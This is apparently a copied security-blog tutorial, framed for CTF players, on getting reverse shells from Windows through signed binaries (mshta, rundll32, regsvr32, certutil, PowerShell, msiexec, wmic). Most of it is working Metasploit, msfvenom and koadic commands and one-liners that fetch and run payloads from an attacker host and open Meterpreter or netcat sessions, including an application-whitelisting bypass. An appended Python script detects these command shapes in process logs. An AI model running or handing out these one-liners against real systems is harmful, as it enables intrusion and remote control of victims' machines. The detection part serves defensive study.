Write Executable Windows Reverse Tcp Shell Meterpreter Upload
This article will help those who play CTF challenges, because today we will discuss "Windows One-Liners": using malicious commands such as PowerShell or rundll32 to get a reverse shell from a Windows system. Generally, while abusing HTTP services or other programs, we get an RCE vulnerability. This loophole allows you to remotely execute any system command. We have therefore prepared a list of Windows commands that enable you to use the target machine to get reverse connections.
Table of Content
Mshta.exe
- Launch HTA attack via HTA Web Server of Metasploit
Rundll32.exe
- Launch Rundll32 Attack via SMB Delivery of Metasploit
Regsvr32.exe
- Launch Regsvr32 via Script Web Delivery of Metasploit
Certutil.exe
- Launch MSbuild Attack via Msfvenom C# shellcode
Powershell.exe
- Launch Powercat attack via Powershell
- Launch cscript.exe via Powershell
- Launch Batch File Attack via Powershell
Msiexec.exe
- Launch msiexec attack via msfvenom
Wmic.exe
- Launch Wmic.exe attack via Koadic
Mshta.exe
Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA (HTML Application) files: HTML files in which we can run JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.
Metasploit contains the "HTA Web Server" module, which generates a malicious hta file. This module hosts an HTML Application (HTA) that, when opened, will run a payload via PowerShell. When a user navigates to the HTA file, they will be prompted by IE twice before the payload is executed.
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
Now run the malicious code through mshta.exe on the victim's machine (vulnerable to RCE) to obtain meterpreter sessions.
Once you execute the malicious hta file on the remote machine with the help of mshta.exe, you get the reverse connection on your local machine (Kali Linux).
mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta
As you can observe, we have the meterpreter session of the victim as shown below:
Rundll32.exe
Rundll32.exe is associated with the Windows operating system and allows you to invoke a function exported from a DLL, either 16-bit or 32-bit, and store it in proper memory libraries.
Launch Rundll32 Attack via SMB Delivery of Metasploit
Metasploit also contains the "SMB Delivery" module, which generates a malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. It currently supports DLLs and PowerShell.
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit
Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain meterpreter sessions.
Once you execute the dll file on the remote machine with the help of rundll32.exe, you will get the reverse connection on your local machine (Kali Linux).
rundll32.exe \\192.168.1.109\vabFG\exam.dll,0
As you can observe, we have the meterpreter session of the victim as shown below:
Regsvr32.exe
Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.
RegSvr32.exe has the following command-line options:
Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>
/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll to uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes
Launch Regsvr32 via Script Web Delivery of Metasploit
This module quickly fires up a web server that serves a payload. The provided command will allow for a payload to download and execute. It will do so either through a specified scripting language interpreter or through "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.
Regsvr32 uses the "squiblydoo" technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)> set target 3
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)> set srvhost 192.168.1.109
msf exploit (web_delivery)> exploit
Copy the highlighted text shown in the window below.
Once you execute the scrobj.dll file on the remote machine with the help of regsvr32.exe, you will get the reverse connection on your local machine (Kali Linux).
regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
As you can observe, we have the meterpreter session of the victim as shown below:
Certutil.exe
Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to execute our malicious exe file on the target machine to get a meterpreter session.
Launch certutil Attack via Msfvenom
Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get the reverse shell of the victim's machine.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe
Now, to dump configuration information or the shell.exe file with certutil, you can follow the syntax below:
Syntax: [-f] [-urlcache] [-split] Path of executable file
certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
As you can observe, we have a meterpreter session of the victim as shown below:
Powershell.exe
You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more on the official Microsoft Windows website.
Launch Powercat attack via Powershell
Powercat is a PowerShell-native backdoor listener and reverse shell, also known as a modified version of netcat, because it has integrated support for the generation of encoded payloads, which msfvenom would do, and also has a client-to-client relay, a term for a Powercat client that allows two separate listeners to be connected.
Download PowerShell on your local machine, then transfer the powercat.ps1 file with a Python HTTP server to obtain a reverse shell of the target as shown below, and start a netcat listener.
git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80
Then execute the following command on the remote side to get a netcat session.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"
As you can observe, we have a netcat session of the victim as shown below:
Batch File
Similarly, PowerShell allows the client to execute a bat file; therefore, let's generate the malicious batch file with msfvenom as given below and start a netcat listener.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat
Then execute the following command on the remote side to get netcat session.
powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))"
As you can observe, we have a netcat session of the victim as shown below:
Cscript
Similarly, PowerShell allows the client to execute cscript.exe to run wsf, js and vbscript files; therefore, let's generate a malicious bat file with msfvenom as given below and start multi/handler as the listener.
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs
Then execute the following command on the remote side to get a meterpreter session.
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
As you can observe, we have a meterpreter session of the victim as shown below:
Msiexec.exe
As we all are aware, Windows OS comes installed with a Windows Installer engine, which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.
Launch msiexec attack via msfvenom
Let'south generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as the listener.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi
Once you execute the 1.msi file on the remote machine with the help of msiexec, you will get the reverse connection on your local machine (Kali Linux).
msiexec /q /i http://192.168.1.109/1.msi
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
As you can observe, we have a meterpreter session of the victim as shown below:
Wmic.exe
The WMIC utility is a Microsoft tool that provides a WMI command-line interface used for a variety of administrative functions on local and remote machines. It is also used for WMI queries such as system settings, and to stop processes and execute scripts locally or remotely. Therefore, it can invoke an XSL script (eXtensible Stylesheet Language).
Launch Wmic.exe attack via Koadic
Now we will generate a malicious XSL file with the help of koadic, a Command & Control tool that is quite similar to Metasploit and PowerShell Empire.
To know how koadic works, read our article here: https://www.hackingarticles.in/koadic-com-command-control-framework/
Once installation is completed, you can run the ./koadic file to start koadic. Begin by loading the stager/js/wmic stager with the following command, and set SRVHOST to where the stager should call home.
use stager/js/wmic
set SRVHOST 192.168.1.107
run
Execute the following WMIC command to download and run the malicious XSL file from a remote server:
wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"
Once the malicious XSL file is executed on the target machine, you will have a Zombie connection just like Metasploit.
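Seen from the defending side, every one-liner in this article has the same shape: a signed Windows binary handed a remote URL or UNC path. The following is an added example, not part of the original article: it matches those shapes in process-creation command lines and raises the severity when the parent is a service process, which is what an RCE in a web service looks like. The rule names, regular expressions, service-parent list and sample events are assumptions of this example.

```python
import re

REMOTE = r"(?:https?://|\\\\)\S+"   # http(s) URL or UNC path
# (rule name, binary pattern, argument pattern); patterns are this example's own
RULES = [
    ("mshta_remote_hta",    r"\bmshta(\.exe)?\b",      REMOTE),
    ("rundll32_unc_dll",    r"\brundll32(\.exe)?\b",   r"\\\\[^\s\\]+\\\S+\.dll"),
    ("regsvr32_remote_sct", r"\bregsvr32(\.exe)?\b",   r"/i:\"?https?://\S+.*\bscrobj\.dll"),
    ("certutil_urlcache",   r"\bcertutil(\.exe)?\b",   r"[-/]urlcache\b.*https?://"),
    ("msiexec_remote_msi",  r"\bmsiexec(\.exe)?\b",    r"/i\s+\"?https?://"),
    ("wmic_remote_xsl",     r"\bwmic(\.exe)?\b",       r"/format:\s*\"?https?://"),
    ("powershell_download", r"\bpowershell(\.exe)?\b", r"\.Download(String|File)\s*\("),
]
COMPILED = [(n, re.compile(b, re.I), re.compile(a, re.I)) for n, b, a in RULES]
# Assumed list of service processes that should not normally spawn these tools
SERVICE_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat9.exe", "sqlservr.exe"}

def detect(cmdline):
    """Return the names of all rules whose binary and argument patterns match."""
    line = " ".join(cmdline.split())   # collapse runs of whitespace
    return [n for n, b, a in COMPILED if b.search(line) and a.search(line)]

def triage(event):
    """Return (hits, severity) for one process-creation event (dict)."""
    hits = detect(event["CommandLine"])
    if not hits:
        return hits, "none"
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return hits, ("high" if parent in SERVICE_PARENTS else "medium")

# Constructed sample events: command lines in the article's forms, plus benign controls
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32 /s C:\Windows\System32\scrobj.dll"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -hashfile C:\iso\image.iso SHA256"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev), ev["CommandLine"])
```

The event dictionaries use the CommandLine and ParentImage field names of Sysmon Event ID 1, so exported records can be passed to triage() directly.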
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.
Source: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/